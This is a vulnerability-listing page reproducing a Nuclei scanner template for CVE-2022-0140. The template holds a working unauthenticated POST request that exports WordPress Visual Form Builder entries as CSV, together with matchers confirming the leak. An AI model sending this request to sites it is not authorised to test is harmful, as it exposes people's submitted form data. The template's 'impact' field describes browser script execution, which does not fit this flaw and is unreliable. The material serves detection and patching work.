CVE-2022-0140: WordPress Visual Form Builder <3.0.8 - Information Disclosure

日期: 2025-08-01 | 影响软件: WordPress Visual Form Builder | POC: 已公开

漏洞描述

WordPress Visual Form Builder plugin before 3.0.8 contains a information disclosure vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.

PoC代码[已公开]

id: CVE-2022-0140

info:
  name: WordPress Visual Form Builder <3.0.8 - Information Disclosure
  author: random-robbie
  severity: medium
  description: |
    WordPress Visual Form Builder plugin before 3.0.8 contains a information disclosure vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.
  impact: |
    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336
    - https://www.fortiguard.com/zeroday/FG-VD-21-082
    - https://nvd.nist.gov/vuln/detail/cve-2022-0140
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-0140
    cwe-id: CWE-306
    epss-score: 0.09629
    epss-percentile: 0.92605
    cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: vfbpro
    product: visual_form_builder
    framework: wordpress
  tags: cve,cve2022,wpscan,disclosure,wordpress,vfbpro

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=vfb-export HTTP/1.1
        Host: {{Hostname}}
        Referer: {{RootURL}}/wp-admin/admin.php?page=vfb-export
        Content-Type: application/x-www-form-urlencoded
        Origin: {{RootURL}}

        vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Date Submitted"'
          - '"Entries ID"'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008c5a8645f70e57db4fcbd47b9c211e780c542c3ac72143d321e1e48a229b93ca02210096698304503bde4c53ebcc66a5986138255121631fbca19b9a54afbcd65866d5:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0140.yaml